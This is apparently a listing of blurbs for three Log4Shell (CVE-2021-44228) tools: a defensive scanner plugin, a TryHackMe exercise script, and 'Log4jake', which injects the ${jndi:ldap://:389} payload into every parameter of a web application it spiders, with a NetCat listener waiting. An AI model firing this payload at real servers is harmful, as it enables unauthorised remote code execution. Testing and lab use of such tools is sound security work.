This plugin discovers vulnerable files for the CVE-2021-44228-log4j issue. To discover this files it uses the CVE-2021-44228-Scanner from logpresso The scanner (and so the plugin) can discover the following log4j issues Note: Included in this package is the scanner for Linux and Windows in version 2.7.1 (2022-01-02) You will find the release notes/latest version for the logpresso scanner here logpresso CVE-2021-44228-Scanner Releases Note: here you can Download the MKP package for CMK 1.6, this might not be always on the […]

This python script was created while I was working on the TryHackMe room for Log4j. While this was created with default variables for this room, I used argparse to make the script versatile for a GET request. All necessary varaibles can be changed with different options, see -h for more information. Only my script is hosted here, this requires two other downloads to run properly which I will give links for, but setting up the folders the way I did […]

Log4jake works by spidering a web application for GET/POST requests. It will then automatically execute the GET/POST requests, filling any discovered parameters with the ${jndi:ldap://:389} Log4j payload. Note that this tool is designed to work simultaneously with a NetCat listener. If you want to test behind authentication, use the commented ‘#req.add_header(‘Authorization’, “token_goes_here”)’ line to add the proper token. If you are experiencing SSL errors, use the commented ‘#context = ssl._create_unverified_context()’ line in addition to ‘resp = urllib.request.urlopen(req, context=context)’ Syntax: